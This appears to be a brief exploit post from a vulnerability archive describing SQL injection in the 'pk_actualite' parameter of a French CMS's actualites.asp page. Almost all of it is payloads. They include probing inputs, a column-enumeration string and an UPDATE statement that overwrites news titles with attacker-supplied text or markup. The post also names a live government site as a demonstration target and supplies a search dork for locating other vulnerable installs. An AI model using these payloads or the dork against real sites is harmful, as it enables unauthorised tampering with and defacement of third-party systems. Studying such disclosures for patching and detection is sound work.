SecurityvulnsSECURITYVULNS:DOC:17437SYSTONÝCfr/portal/ actualites.asp sql injection
SYSTONЭCfr/portal/ actualites.asp sql injection
Credit : CodeXpLoder'tq
mail : codexploder[at]hotmail[dot]com
site : Biyosecurity.net,expw0rm.com
thx : BiyoSecurityTeam
spec.note : "Live The Life"
/////////////////////////////////////////////////////////////////
1-) example.com/actualites.asp?pk_actualite=(sql methot)
1-) example.com/actualites.asp?pk_actualite=(sql methot)
//////////////////////////////////////////////////////////////////
2-) example.com/actualites.asp?pk_actualite=1'
2-) example.com/actualites.asp?pk_actualite=1 having 1=1
2-) example.com/actualites.asp?pk_actualite=,2,3,4,5
2-) example.com/actualites.asp?pk_actualite=1,2,3,4,5+update+tbl+set+column='your text or meta code';–
#tbl : actus
#column : titre
###################################################################
sourge site : http://www.systonic.fr
demo site : http://www.haute-garonne.fr/
order code for views site :inurl:"actualites.asp?pk_actualite"